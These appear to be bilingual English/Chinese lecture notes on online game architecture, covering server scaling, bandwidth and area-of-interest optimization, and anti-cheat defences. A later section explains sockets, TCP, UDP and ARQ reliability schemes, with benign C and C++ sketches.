    • Fast Sorted/Ranged Searches

      快速排序/范围搜索

    • Persistence among servers

      服务器间的持久性

    Game Development Examples

    游戏开发示例

    • Matchmaking

      配对

    • Leaderboards

      排行榜

    • Session Management

      会话管理

    • Boost Performance For Other Databases

      提高其他数据库的性能

    Player Number Growth

    玩家数量增长带来的服务器负担

    webp

    Distributed System

    分布式系统

    A distributed system is a computing environment in which various components are spread across multiple computers (or other computing devices) on a network

    分布式系统是一种计算环境,其中各种组件分布在网络上的多台计算机(或其他计算设备)上

    webp

    Challenges with Distributed systems

    分布式系统的挑战

    • Data access mutual exclusion

      数据访问互斥

    • Idempotence

      幂等性

    • Failure and partial failure

      故障和部分故障

    • Unreliable network

      不可靠的网络

    • Distributed bugs spread epidemically

      分布式漏洞以流行病的方式传播

    • Consistency and consensus

      一致性和共识

    • Distributed transaction

      分布式事务

    Load Balancing

    负载平衡

    Refers to the process of distributing a set of tasks over a set of resources (computing units), with the aim of making their overall processing more efficient

    指将一组任务分配到一组资源(计算单元)上的过程,目的是提高其整体处理效率

    • Optimize the response time

      优化响应时间

    • Avoid unevenly overloading some compute nodes while other compute nodes are left idle

      避免在其他计算节点处于空闲状态时,不均匀地使某些计算节点过载

    • All players are evenly divided on multiple servers

      所有玩家平均分布在多个服务器上

    webp

    Consistent Hashing

    一致散列

    It was designed to avoid the problem of having to reassign every player when a server is added or removed throughout the cluster

    它旨在避免在整个集群中添加或删除服务器时必须重新分配每个玩家的问题

    webp

    webp

    webp

    Virtual Server Node in Consistent Hashing

    一致散列中的虚拟服务器节点

    webp
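
    A minimal sketch of a consistent-hash ring with virtual server nodes (std::hash is a stand-in for a better-distributed hash; the names are illustrative):

    #include <cstdint>
    #include <functional>
    #include <map>
    #include <string>

    class HashRing {
    public:
        void addServer(const std::string& name, int virtualNodes = 100) {
            for (int i = 0; i < virtualNodes; i++)
                ring_[hash(name + "#" + std::to_string(i))] = name;
        }
        void removeServer(const std::string& name, int virtualNodes = 100) {
            for (int i = 0; i < virtualNodes; i++)
                ring_.erase(hash(name + "#" + std::to_string(i)));
        }
        // Map a player to the first server node clockwise from its hash; only
        // players near a removed/added node get reassigned.
        const std::string& serverFor(const std::string& playerId) const {
            auto it = ring_.lower_bound(hash(playerId));
            if (it == ring_.end()) it = ring_.begin(); // wrap around the ring
            return it->second;
        }
    private:
        static uint64_t hash(const std::string& s) { return std::hash<std::string>{}(s); }
        std::map<uint64_t, std::string> ring_; // position on ring -> server name
    };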

    Servers Management

    服务器管理

    • The number of services increases

      服务数量增加

    • Difficult to manage

      难以管理

    • Lacks the flexibility to change the IP or port at a later point in time

      缺乏在以后更改 IP 或端口的灵活性

    webp

    Service Discovery - Registry

    服务发现-注册表

    • Registers itself with the service registry when it enters the system

      当服务进入系统时,在服务注册表中注册

    • An example of Register value

      注册值的一个示例

      • server type/server_name@server_ip:port

    webp

    Service Discovery - Query and Watch

    服务发现-查询和监视

    • Request service discovery service to query all values through service type and watch it

      请求服务发现服务,通过服务类型查询所有值并监视其变化

    webp

    Service Discovery - Health Check

    服务发现-健康检查

    • The gateway notices Server B's failure when Server Instance B's heartbeat times out

      当服务器实例 B 心跳超时时,网关会发现服务器 B 故障

    webp

    Bandwidth Optimization

    带宽优化

    Why Bandwidth Matters

    为什么带宽很重要

    • Usage-based billing: e.g. mobile, cloud service

      基于使用量的计费:例如移动、云服务

    • Latency increased by bandwidth: packet splitting/drop

      延迟随带宽增加:数据包拆分/丢弃

    • Connection drops due to message overflow

      消息溢出导致连接中断

    Calculate Bandwidth

    计算带宽

    Affecting factors

    影响因素

    • n = player numbers 玩家数量
    • f = update frequency 更新频率
    • s = size of game state 游戏状态大小

    webp

    Data transfer per second

    每秒数据传输

    • Server 服务器:$O(n\cdot s\cdot f)$

    • Client (downstream) 客户端(下游):$O(s\cdot f)$

    • Client (upstream) 客户端(上游):$O(f)$

    webp

    Data Compression

    数据压缩

    • There are a lot of floating point numbers in the game synchronization data, such as position, rotation, speed, etc.

      游戏同步数据中有很多浮点数,如位置、旋转、速度等。

    • Choosing the right floating-point precision can save a lot of bandwidth

      选择正确的浮点精度可以节省大量带宽。

      • e.g. When representing human running speed, only half precision is required

        例如,在表示人类跑步速度时,只需要一半的精度

    webp

    • When representing player position, the player will only move within a certain range due to player speed limitations

      代表玩家位置时,由于玩家速度限制,玩家只能在一定范围内移动

    • We can divide the map into different small pieces and use the relative position to represent the player’s position, which can reduce the precision of the floating point number of the synchronization position

      我们可以将地图分成不同的小块,并使用相对位置来表示玩家的位置,这会降低同步位置浮点数的精度

    webp
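
    A minimal sketch of this relative-position idea: quantizing a coordinate into a map cell index plus a 16-bit offset (the cell size and 1 cm precision are illustrative assumptions):

    #include <cmath>
    #include <cstdint>

    constexpr float kCellSize  = 655.36f; // one map cell covers 655.36 m
    constexpr float kPrecision = 0.01f;   // 1 cm steps: 65536 * 0.01 = 655.36

    struct QuantizedCoord { int16_t cell; uint16_t offset; };

    QuantizedCoord quantize(float x) {
        float cell = std::floor(x / kCellSize);
        float rel  = x - cell * kCellSize; // relative position within the cell
        return { static_cast<int16_t>(cell),
                 static_cast<uint16_t>(rel / kPrecision) };
    }

    float dequantize(QuantizedCoord q) {
        return q.cell * kCellSize + q.offset * kPrecision;
    }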

    Object Relevance

    对象相关性

    • The player will be informed of state updates

      玩家将收到状态更新的通知

    • Usually, the ones the player can see & interact with

      通常是玩家可以看到并与之交互的对象

    • Easiest implementation: all objects are relevant to all clients (for small player numbers): $O(n^2)$

      最简单的实现:所有对象与所有客户端相关(适用于玩家数量较少的情况):$O(n^2)$

    • Limiting factor for max concurrent players

      最大并发玩家的限制因素

    webp

    Relevance - Static Zones

    相关性-静态区域

    • Distribute players into different zones

      将玩家分配到不同的区域

    • Players are relevant in the same zone

      玩家在同一区域内具有相关性

    • Reduce bandwidth waste

      减少带宽浪费

    webp

    Relevance - Area of Interest (AOI)

    相关性-关注领域(AOI)

    • The area within which objects are relevant to Player/NPC

      对象与玩家 / NPC 相关的区域

    • Only see & interact with objects within range

      仅查看范围内的对象并与之交互

    • Remove unnecessary network data

      删除不必要的网络数据

    webp

    AOI -Direct Range-Query

    AOI - 直接范围查询

    • $\sqrt{(x_{player}-x_i)^2+(y_{player}-y_i)^2}\le r_{aoi}$

    • Simple to implement 易于实施

    • Time complexity 时间复杂度: $O(n^2)$

    • Not suitable for MMOG, e.g. 1000 players in one zone, 20 ticks/s

      不适合 MMOG,例如一个区域有 1000 名玩家,每秒 20 个 tick

      1000 x 1000 x 20 = 20,000,000 distance computations per second

      1000 x 1000 x 20 = 每秒 2000 万次距离计算

    webp

    AOI - Spatial-Grid

    AOI - 空间网格

    Mapping Entities

    映射实体

    • Map entity $(x, y)$ → grid $N$

      映射实体$(x, y)$ → 网格 $N$

    • Relevant entities in the grids around current player’s grid

      当前玩家网格周围网格中的相关实体

    • Player’s AOI list can be cached

      玩家的 AOI 列表可以缓存

    webp
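
    A minimal sketch of the spatial-grid query (the grid size and types are illustrative): the player's cell and its 8 neighbours are scanned, so the query cost does not depend on the total entity count:

    #include <cmath>
    #include <cstdint>
    #include <unordered_map>
    #include <vector>

    constexpr float kGridSize = 50.0f; // cell size roughly matching the AOI radius
    using EntityId = uint32_t;

    // Pack a 2D cell coordinate into one 64-bit key.
    int64_t cellKey(int32_t gx, int32_t gy) {
        return (static_cast<int64_t>(gx) << 32) | static_cast<uint32_t>(gy);
    }

    std::unordered_map<int64_t, std::vector<EntityId>> grid; // cell -> entities

    void insertEntity(EntityId id, float x, float y) {
        grid[cellKey(static_cast<int32_t>(std::floor(x / kGridSize)),
                     static_cast<int32_t>(std::floor(y / kGridSize)))].push_back(id);
    }

    // Relevant entities: the player's cell plus its 8 neighbours, O(1) cells.
    std::vector<EntityId> queryAOI(float x, float y) {
        int32_t gx = static_cast<int32_t>(std::floor(x / kGridSize));
        int32_t gy = static_cast<int32_t>(std::floor(y / kGridSize));
        std::vector<EntityId> result;
        for (int dx = -1; dx <= 1; dx++)
            for (int dy = -1; dy <= 1; dy++) {
                auto it = grid.find(cellKey(gx + dx, gy + dy));
                if (it != grid.end())
                    result.insert(result.end(), it->second.begin(), it->second.end());
            }
        return result;
    }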

    Events

    事件

    Enter

    进入

    • Add entities to the observation (observed) list

      将实体添加到观察(被观察)列表

    Leave

    离开

    • Remove entities from the observation (observed) list

      将实体从观察(被观察)列表中移除

    webp

    Pros and Cons

    优点和缺点

    Pros

    • Fast query time $O(1)$

      快速查询时间 $O(1)$

    Cons

    • Small grid: high memory cost

      小网格:内存成本高

    • Large grid: high CPU cost

      大网格:CPU 成本高

    • Object with varying AOI radius?

      具有不同 AOI 半径的物体?

    webp

    AOI - Orthogonal Linked-list

    AOI - 正交链表

    • Game entities in double linked-list

      双链表中的游戏实体

      • xlist, ylist

      • ascending order

        升序

    • Fewer objects to traverse

      需要遍历的对象更少

    webp

    Traverse entities

    遍历实体

    • Within AOI radius

      AOI 半径内

    • Left/right direction

      左 / 右方向

    • For both x/y lists

      对于 x/y 两个列表

    webp

    Better Approach - Range Trigger

    更好的方法-范围触发

    • Entity move → trigger move

      实体移动 → 触发移动

    • Compare with trigger

      与触发器比较

    • Event driven

      事件驱动

    webp

    Pros

    • Memory efficient

      内存效率高

    • Varying AOI radius

      可变 AOI 半径

    Cons

    • New object insertion cost $O(n)$

      新对象插入成本 $O(n)$

    • Not suitable when entities frequently move large distances

      当实体频繁地远距离移动时不适用

    webp

    AOI - Potentially Visible Set (PVS)

    AOI - 潜在可见集(PVS)

    • Set of potentially visible areas

      一组潜在可见区域

    • Can be calculated offline

      可以离线计算

    • Determine relevant objects from PVS

      从 PVS 中确定相关对象

    • e.g. Racing game: fast-moving car

      例如赛车游戏:快速行驶的汽车

    webp

    Varying Update Frequency by Player Position

    根据玩家位置改变更新频率

    • Distance-based update frequency

      基于距离的更新频率

    • Only closer objects are interactable

      只有较近的对象是可交互的

    • Distance ↑ → f ↓ → bandwidth ↓

      距离 ↑ → f ↓ → 带宽 ↓

    webp

    Cheating Kills Online Games

    作弊毁掉网络游戏

    How likely, if at all, would you be to stop playing a multiplayer game online if you thought other players were cheating to gain an unfair advantage?

    如果你认为其他玩家作弊以获得不公平的优势,你有多大可能停止玩在线多人游戏?

    | | Very likely | Fairly likely | Not very likely | Not likely at all | Don't know |
    | --- | --- | --- | --- | --- | --- |
    | Global | 29% | 48% | 15% | 4% | 5% |
    | China | 25% | 56% | 16% | 2% | 1% |
    | Germany | 30% | 36% | 17% | 8% | 8% |
    | Japan | 26% | 49% | 16% | 2% | 7% |
    | South Korea | 27% | 59% | 11% | 1% | 1% |
    | UK | 33% | 39% | 12% | 6% | 10% |
    | US | 37% | 32% | 15% | 7% | 8% |

    77% of players will likely stop playing online games when other players are cheating, according to the survey of Irdeto.

    爱迪德的调查显示,当其他玩家作弊时,77% 的玩家可能会停止玩网络游戏。

    Millions of Ways of Cheating

    数百万种作弊方式

    Game code modifications

    游戏代码修改

    • Modify or read memory data

      修改或读取内存数据

    • Crack client

      破解客户端

    System software invoke

    系统软件调用

    • D3D Render Hook

      D3D 渲染挂钩

    • Simulate mouse and keyboard operations

      模拟鼠标和键盘操作

    Net Packet interception

    网络数据包拦截

    • Send fake packets

      发送虚假数据包

    • Modify packet data

      修改数据包

    webp

    Obfuscating Memory

    混淆内存

    • A cheater might be able to get the location of the player coordinates in the memory and move the character ignoring the game rules, such as passing through walls

      作弊者可能能够获得玩家坐标在内存中的位置,并无视游戏规则移动角色,例如穿墙

    • Furthermore, the cheater can utilize the location of these values to map out even larger data structures in the memory, such as the player object itself

      此外,作弊者可以利用这些值的位置在内存中绘制出更大的数据结构,例如玩家对象本身

    webp

    Executable Packers

    可执行打包器

    • Game core logic can be restored by reverse engineering

      游戏核心逻辑可以通过逆向工程恢复

    • Players can crack the game by analyzing the code, finding game loopholes, making plug-ins, etc…

      玩家可以通过分析代码、发现游戏漏洞、制作插件等来破解游戏…

    webp

    • The packer obfuscates the source program and adds decompression code

      打包器混淆源程序并添加解压缩代码

    • The decompression code will execute first, and the source program is decrypted in memory

      解压缩代码将首先执行,源程序在内存中解密

    webp

    Verifying Local Files by Hashing

    通过哈希验证本地文件

    • Ensure that the game files have not been modified

      确保游戏文件未被修改

    • For example, the cheater could modify the wall textures to be transparent so all enemies could be seen through the walls

      例如,作弊者可以将墙壁纹理修改为透明,这样所有敌人都可以透过墙壁看到

    • The cheater could also adjust the lighting to make it easier to see enemies

      作弊者还可以调整光照,使其更容易看到敌人

    webp

    Packet Interception and Manipulation

    数据包拦截和操纵

    • When the data is not encrypted (or the encryption has been cracked), the player can build game logic based on packet data even without starting the game

      当数据未加密(或加密已被破解)时,即使不启动游戏,玩家也可以基于数据包构建游戏逻辑

    • Such cheat programs often become money-making tools, which seriously reduce the game's overall profit

      这种作弊程序往往成为赚钱的工具,严重降低了游戏的整体利润

    webp

    Encrypt the Network Traffic

    加密网络流量

    Two kinds of algorithms

    两种算法

    • Symmetric-key algorithm

      对称密钥算法

      • Obfuscate and restore data according to the same key

        根据同一密钥混淆和还原数据

      • Fast and efficient

        快速高效

    webp

    Asymmetric encryption

    非对称加密

    • Encryption and decryption use different keys

      加密和解密使用不同的密钥

    • Slow, only used for encrypting critical data

      速度慢,仅用于加密关键数据

    webp

    • Distribute symmetric key securely using asymmetric encryption

      使用非对称加密安全地分发对称密钥

    • Transfer data using symmetric encryption key

      使用对称加密密钥传输数据

    webp

    System Software Invoke

    系统软件调用

    • Modify the DirectX kernel and change the execution flow of the rendering function

      修改 DirectX 内核并更改渲染函数的执行流程

    • Can force the rendering engine to modify the occlusion relationship

      可以强制渲染引擎修改遮挡关系

    • See the movement of the enemy behind the wall

      看墙后敌人的动向

    webp

    Valve Anti-Cheat and Easy Anti-Cheat

    Valve Anti-Cheat(VAC)与 Easy Anti-Cheat

    • Detects malicious behavior caused by any file conflicts while interacting with the game

      检测与游戏交互时由任何文件冲突引起的恶意行为

    • Stops the player from playing the game at all

      完全阻止玩家玩游戏

    • Prevents any illegal modifications and configuration changes that enable the use of exploits in a game

      防止任何非法修改和配置更改,从而在游戏中使用漏洞

    webp

    AI Cheat

    AI 作弊

    • All platforms

      所有平台

    • No code modification required

      无需修改代码

    • Independent from the game

      独立于游戏

    • Game screen

      游戏画面

    • Target detection

      目标检测

    • Move cursor

      移动光标

    • Fire

      开火

    webp

    Rich AI Middlewares

    丰富的 AI 中间件

    • Real-Time Object Detection. YOLO V5, V7…

      实时目标检测。YOLO V5,V7…

    • Skeleton based Action recognition

      基于骨架的动作识别

    webp

    Counter-Strike: Overwatch

    反恐精英:Overwatch(监管系统)

    • The system is based on other players reviewing footage from players that are suspected of cheating

      该系统基于其他玩家查看涉嫌作弊的玩家的录像

    • Many reviewers are looking at the same cases and the majority decide whether the suspect was cheating or not

      许多审查人员正在审查同样的案件,大多数人决定嫌疑人是否作弊

    webp

    Passing judgement after reviewing evidence in Counter Strike: Global Offensive’s Overwatch system

    在《反恐精英:全球攻势》的 Overwatch(监管)系统中审查证据后作出判断

    Statistic-based System

    基于统计的系统

    • Collect the user’s game information, such as victory and critical hit rate

      收集用户的游戏信息,如胜利和暴击率

    • Compare your own historical data and some thresholds rules or from other player’s reports to mark players

      比较您自己的历史数据和一些阈值规则或其他玩家的报告,以标记玩家

    • Check manually to confirm whether they cheat

      手动检查以确认他们是否作弊

    webp

    Detecting Known Cheat Program

    检测已知作弊程序

    • A proper anti-cheat program should have a way to scan the user’s computer for known cheating programs based on various signatures

      一个合适的反作弊程序应该有一种方法,可以根据各种签名扫描用户的计算机,寻找已知的作弊程序

    • The simplest method can simply entail comparing hashes or process names

      最简单的方法可能只是比较哈希或进程名称

    webp

    Build a Scalable World

    构建一个可扩展的世界

    Scalable Game Servers

    可扩展游戏服务器

    Zoning

    分区

    • Distribute large player numbers in a large world

      在广阔的世界中分配大量玩家

    • Distribution might be uneven

      分布可能不均匀

    Instancing

    实例化

    • Run a large number of game areas independently in parallel

      并行独立运行大量游戏区域

    • Reduce congestion/competition

      减少拥堵 / 竞争

    Replication

    同步

    • Allows high user density

      允许高用户密度

    • E.g. high density PVP games

      例如高密度 PVP 游戏

    Zoning - Seamless Zones

    分区-无缝分区

    • Players are reasonably distributed in a large world

      玩家在广阔的世界中分布合理

    • The client only connects to one responsible server

      客户端只连接到一个负责的服务器

    • Cross border: auto transfer client to another server

      跨越边界:自动将客户端转移到另一台服务器

    webp

    Zone Border

    区域边界

    Smooth experience:

    流畅体验:

    • Border width >= max AOI radius

      边框宽度 >= 最大 AOI 半径

    But how to make them interact?

    但是如何让它们互动呢?

    webp

    Zone Border - Entities

    区域边界-实体

    Active Entity

    活跃实体

    • Resides in connected zoned server (authority)

      驻留在已连接的分区服务器(权限)中

    • Has a ghost agent in other zones

      在其他区域有一个幽灵代理(ghost agent)

    • Can see ghost entities in another zone

      可以在另一个区域中看到幽灵实体

    Ghost Entity

    幽灵实体

    • Also called shadow entity

      也称为阴影实体

    • Is an agent entity owned by another zone

      是由另一个区域拥有的代理实体

    • Receive updates from original entity

      接收来自原始实体的更新

    webp

    Cross Border: A -> B

    跨越边界:A->B

    1. Before move

      移动前

      • An active entity in zone A

        A 区中的活动实体

    2. Near boundary (A)

      近边界(A)

      • Active in A; Ghost in B

        活跃在 A;鬼魂在 B

    3. At boundary

      边界处

      • The entity has been transferred to zone B

        实体已转移到 B 区

    4. Near boundary (B)

      边界附近(B)

      • Active in B; Ghost in A

        活跃于 B;鬼魂在 A

    5. Beyond boundary (B)

      边界之外(B)

      • Removed from zone A

        从 A 区移除

    webp

    Replication

    同步

    • Cooperatively process same world zone

      合作处理同一世界区

    • Entity updates are distributed among servers

      实体更新分布在服务器之间

    • Each server creates its own active entities

      每个服务器都创建自己的活动实体

    • Updates to active entities will be auto replicated to all remaining servers (as Ghost)

      对活动实体的更新将自动复制到所有剩余的服务器(作为 Ghost)

    webp

    Scalable Game Servers - Combination

    可扩展游戏服务器——组合

    webp

    References

    Replicate Character Movement

    Lag Mitigation

    MMOG Network Architecture

    Bandwidth Optimization

    Anti-Cheat


    第十八节:网络游戏的架构基础

    Online Gaming Architecture: Fundamentals

    网络游戏架构

    PLAY ANYWHERE WITH ANYONE

    与任何人随时随地玩游戏

    Game developers have never stopped exploring multiplayer online gaming

    游戏开发商从未停止探索多人在线游戏

    Challenges in Multiplayer Online Gaming

    多人联机游戏的挑战

    Consistency

    一致性

    • Network Synchronization

      网络同步

    Reliability

    可靠性

    • Network Latency

      网络延迟

    • Drop and Reconnect

      断线重连

    Security

    安全性

    • Cheats

      作弊

    • Accounts Hacked

      账户被黑客攻击

    Diversities

    多样性

    • Cross-Play

      跨平台游玩

    • Rapid iteration

      快速迭代

    • Multiple Game Systems

      多游戏系统

    Complexities

    复杂性

    • High Concurrency

      高并发性

    • High Availability

      高可用性

    • High Performance

      高性能

    Network Protocols

    网络协议

    The Founding Fathers of the Internet

    互联网的创始人(一开始用于军事用途)

    Designed the TCP/IP protocols and the internet architecture.

    设计了 TCP/IP 协议和互联网架构。

    In 1977, Cerf and Kahn linked three networks (packet radio, satellite, and the ARPANET) and proved the efficacy of their TCP/IP protocol in a dramatic round-the-world transmission from a moving vehicle, the SRI Packet Radio Research van.

    1977 年,Cerf 和 Kahn 连接了三个网络(分组无线电、卫星和 ARPANET),并通过移动车辆 SRI 分组无线电研究车进行的戏剧性环球传输,证明了他们的 TCP/IP 协议的有效性。

    How to Communicate Between Two PCs

    两台 PC 之间如何通信

    • A and B must agree on the meaning of the bits being sent and received at many different levels, including

      A 和 B 必须就在许多不同级别发送和接收的比特的含义达成一致,包括

      • How many volts represents a 0 bit, and for a 1 bit?

        多少伏特代表 0 位,多少伏特代表 1 位?

      • How does receiver know which is the last bit?

        接收器如何知道哪个是最后一位?

      • How many bits long is a number?

        一个数字有多少位长?

    webp

    The Problem of Communication

    沟通问题

    webp

    • Re-implement every application for every new underlying transmission medium?

      为每个新的底层传输介质重新实现每个应用程序?

    • Change every application on any change to an underlying transmission medium?

      基础传输介质发生任何变化时,都要更改每个应用程序?

    • No! But how does the Internet design avoid this?

      不!但是,互联网设计是如何避免这种情况的呢?

    Solution: Layering

    解决方法:分层

    webp

    • Intermediate layers provide a set of abstractions for applications and media

      中间层为应用程序和媒体提供了一组抽象

    • New applications or media only need to implement the intermediate layer's interface

      新的应用程序或媒体只需要实现中间层的接口

    Layering in the internet - OSI Model

    互联网分层——OSI 模型

    Application 应用层

    • Provides functions to users 为用户提供功能

    Presentation 表示层

    • Converts different representations 转换不同的表示形式

    Session 会话层

    • Manages task dialogs 管理任务对话框

    Transport 传输层

    • Provides end-to-end delivery 提供端到端交付

    Network 网络层

    • Sends packets over multiple links 通过多个链路发送数据包

    Data Link 数据链路层

    • Sends frames of information 发送信息帧

    Physical 物理层

    • Sends bits as signals 以信号形式发送比特

    webp

    Network Socket-based Communication

    基于网络套接字的通信

    webp

    Socket

    套接字

    A software structure within a network node of a computer network that serves as an endpoint for sending and receiving data across the network.

    计算机网络的网络节点内的软件结构,用作通过网络发送和接收数据的端点。

    A Socket is a combination of an IP Address and a Port Number.

    Socket 是 IP 地址和端口号的组合。

    webp

    // server side
    struct sockaddr_in saddr, caddr;
    int sockfd, clen, isock;
    unsigned short port = 80;

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("Error creating socket\n");
        ...
    }

    memset(&saddr, '\0', sizeof(saddr));       // zero structure out
    saddr.sin_family = AF_INET;                // match the socket() call
    saddr.sin_addr.s_addr = htonl(INADDR_ANY); // bind to any local address
    saddr.sin_port = htons(port);              // specify port to listen on

    if (bind(sockfd, (struct sockaddr *)&saddr, sizeof(saddr)) < 0) { // bind
        printf("Error binding\n");
        ...
    }

    if (listen(sockfd, 5) < 0) { // listen for incoming connections
        printf("Error listening\n");
        ...
    }

    clen = sizeof(caddr);
    if ((isock = accept(sockfd, (struct sockaddr *)&caddr, &clen)) < 0) { // accept one
        printf("Error accepting\n");
        ...
    }
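
    For comparison, a minimal sketch of the client side under the same conventions (the server address 127.0.0.1 and port 80 are illustrative assumptions):

    // client side (minimal sketch)
    struct sockaddr_in saddr;
    int sockfd;
    unsigned short port = 80;

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("Error creating socket\n");
        ...
    }

    memset(&saddr, '\0', sizeof(saddr));
    saddr.sin_family = AF_INET;
    saddr.sin_port = htons(port);                     // the server's listening port
    inet_pton(AF_INET, "127.0.0.1", &saddr.sin_addr); // assumed server address

    if (connect(sockfd, (struct sockaddr *)&saddr, sizeof(saddr)) < 0) { // connect
        printf("Error connecting\n");
        ...
    }

    // the socket is now ready for send()/recv()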

    Setup Socket

    创建套接字

    Both client and server need to setup the socket

    客户端和服务器都需要设置套接字

    • Function 函数

      int socket(int domain, int type, int protocol)

      • domain

        • AF_INET – IPV4

        • AF_INET6 – IPV6

      • type

        • SOCK_STREAM – TCP

        • SOCK_DGRAM – UDP

      • protocol

        • 0

    • E.g. 例如

      int sockfd = socket(AF_INET, SOCK_STREAM, 0);

    Transmission Control Protocol (TCP)

    传输控制协议(TCP)

    • Connection-Oriented

      面向连接

    • Reliable and Ordered

      可靠且有序

    • Flow Control

      流量控制

    • Congestion Control

      拥堵控制

    webp

    TCP Retransmission Mechanisms

    TCP 重传机制

    Duplicate ACKs

    重复 ACK

    • Sender sends packets with sequence numbers

      发送方发送带序列号的数据包

      • 1,2, 3, 4, 5, 6, 7, 8
    • Assume the 5th packet (seqno 5) is lost; the stream of ACKs will be

      假设第 5 个数据包(序列号 5)丢失,则 ACK 流将是

      • 1, 2, 3, 4, 4, 4, 4

    webp

    TCP congestion control

    TCP 拥塞控制

    • The congestion window (CWND) of TCP starts to grow from a small value

      TCP 的拥塞窗口(CWND)从一个小值开始增长

    • When congestion occurs, packet loss or timeout, CWND will be reduced according to a certain algorithm

      当发生拥塞、丢包或超时时,CWND 将根据特定算法减少

    • This leads to high delay and causes delay jitter

      这会导致高延迟并导致延迟抖动

    webp

    As the main transmission protocol on the Internet, TCP congestion control is necessary; otherwise it will cause congestion collapse. TCP congestion control is the main congestion control measure on the Internet, and it is also the main cause of TCP performance problems.

    作为互联网上的主要传输协议,TCP 拥塞控制是必要的,否则会导致拥塞崩溃。TCP 拥塞控制是互联网上主要的拥塞控制措施,也是 TCP 性能问题的主要原因。

    User Datagram Protocol (UDP)

    用户数据报协议(UDP)

    David P. Reed

    He was involved in the early development of TCP/IP, and was the designer of the User Datagram Protocol (UDP), though he finds this title "a little embarrassing".

    他参与了 TCP/lP 的早期开发,是**用户数据报协议(UDP)**的设计者,尽管他觉得这个头衔“有点尴尬”。

    He was also one of the authors of the original paper about the end-to-end principle, "End-to-End Arguments in System Design", published in 1984.

    他也是 1984 年发表的关于端到端原理系统设计中的端到端论证的原始论文的作者之一。

    UDP Features

    UDP 功能

    UDP (User Datagram Protocol)

    UDP(用户数据报协议)

    • Connectionless

      无连接

    • Unreliable and Unordered

      不可靠和无序

    • NO Flow Control

      无流量控制

    • No Congestion Control

      无拥塞控制

    webp

    Network Protocols Usage in Games

    游戏中网络协议的使用

    Games suited to each protocol

    适合每种协议的游戏

    • TCP: Hearthstone

      炉石传说

    • UDP: Overwatch, CS:GO

      守望先锋、CSGO

    | | TCP | UDP |
    | --- | --- | --- |
    | Structure 结构 | Segments 报文段 | Datagrams 数据报 |
    | Connection Model 连接模型 | Connection-Oriented 面向连接 | Connectionless 无连接 |
    | Speed 速度 | Slow 慢 | Fast 快 |
    | Reliability 可靠性 | Reliable 可靠 | Unreliable 不可靠 |
    | Header 标头 | 20 Bytes | 8 Bytes |
    | Data Transfer 数据传输 | Ordered 有序 | Unordered 无序 |
    | Control 控制 | Flow Control 流量控制 | No Flow Control 无流量控制 |

    Reliable UDP

    可靠 UDP,在 UDP 的基础上加以改进。

    TCP is Not Time Critical

    TCP 不重视及时性

    • TCP is the complex and heavyweight protocol. It provides reliable delivery and advanced features, but it has more overhead.

      TCP 是复杂而重量级的协议。它提供可靠的交付和高级功能,但开销更大。

    • TCP is a fair, traffic oriented protocol designed to improve bandwidth utilization. But it’s not designed for speed.

      TCP 是一种公平的、面向流量的协议,旨在提高带宽利用率。但它不是为速度而设计的。

    • So why is TCP slow?

      为什么 TCP 很慢?

    UDP is Fast but Unreliable

    UDP 速度快但不可靠

    • UDP is lightweight and fast but unreliable, packet loss and disorder will occur.

      UDP 是轻量级和快速的,但不可靠,会发生数据包丢失和混乱。

    • How to achieve reliable and real-time communication?

      如何实现可靠和实时的通信?

    Why We Need to Customize Protocol

    为什么我们需要定制协议

    • Game Server

      游戏服务器

      • Keep-alived connection (TCP)

        保持有效连接(TCP)

      • Need keep logic consistency in “order” (TCP)

        需要保持“顺序”(TCP)中的逻辑一致性

      • High responsive & low latency (UDP)

        高响应和低延迟(UDP)

      • Broadcast commonly used (UDP)

        常用广播(UDP)

    • Web Server

      Web 服务器

      • Handles the HTTP protocol

        处理 HTTP 协议

      • Delivers static web content e.g., HTML pages, files, images, video.

        提供静态网络内容,例如 HTML 页面、文件、图像、视频。

    Acknowledgement & Sequence Number

    确认和序列号

    • Positive acknowledgment (ACK) is a signal that is passed between communicating processes, computers, or devices to signify acknowledgment, or receipt of message

      **肯定应答(ACK)**是在通信进程、计算机或设备之间传递的信号,表示确认或收到消息

    • Negative ACK (NACK or NAK) is a signal that is sent to reject a previously received message or to indicate some kind of error

      **否定 ACK(NACK 或 NAK)**是一种信号,用于拒绝之前接收到的消息或指示某种错误

    • Sequence number (SEQ) is a counter used to keep track of every byte sent outward by a host

      **序列号(SEQ)**是一个计数器,用于跟踪主机向外发送的每个字节

    • Timeouts are specified periods of time allowed to elapse before an acknowledgment is to be received

      超时在收到确认之前允许经过的特定时间段

    Automatic Repeat Request (ARQ)

    自动重复请求(ARQ)

    An error-control method for data transmission that uses ACK and timeouts to achieve reliable data transmission over an unreliable communication channel.

    一种用于数据传输的错误控制方法,该方法使用 ACK 和超时来在不可靠的通信信道上实现可靠的数据传输。

    If the sender does not receive an acknowledgment before the timeout, it re-transmits the packet until it receives an acknowledgment or exceeds a predefined number of retransmissions.

    如果发送方在超时之前没有收到确认,它会重新发送数据包,直到收到确认或超过预定义的重新传输次数。

    • Sliding window protocol

      滑动窗口协议

      • Stop-and-Wait ARQ

        停止并等待 ARQ

      • Go-Back-N ARQ

      • Selective Repeat ARQ

        选择性重复 ARQ

    Sliding Window Protocol

    滑动窗口协议

    • Send multiple frames at a time; the number of frames to be sent is based on the window size

      一次发送多个帧,要发送的帧数基于窗口大小

    • Each frame is numbered by Sequence number

      每帧按序列号编号

    • When the frame at the front of the window is received, the window slides

      当窗口最前面的帧被接收后,窗口向前滑动

    webp

    webp

    Stop-and-Wait ARQ

    停止并等待 ARQ

    • Windows size = 1

      窗口大小 = 1

    • After transmitting one frame, the sender waits for an ACK before transmitting the next frame

      发送一帧后,发送方在发送下一帧之前等待 ACK

    • If the ACK does not arrive after a certain time, the sender times out and retransmits the original frame

      如果 ACK 在特定时间后未到达,则发送方超时并重新传输原始帧

    • Poor utilization of bandwidth, poor performance

      带宽利用率低,性能差

    webp

    Go-Back-N ARQ

    回退 N 帧 ARQ

    • N is Sender’s Windows Size

      N 是发件人的窗口大小

    • The Receiver only sends cumulative ACK

      接收器仅发送累积 ACK

    • If an ACK is not received within an agreed-upon time period, all frames in the current window are retransmitted

      如果在约定的时间段内未收到 ACK,则重传当前窗口中的所有帧

    webp

    Selective Repeat ARQ

    选择性重复 ARQ

    • In Selective Repeat ARQ, only the damaged or lost frames are retransmitted

      在选择性重复 ARQ 中,只有损坏或丢失的帧会被重新传输

    • The receiver sends the ack of each frame, and the sender maintains the timeout time of each frame

      接收方发送每帧的 ack,发送方保持每帧的超时时间

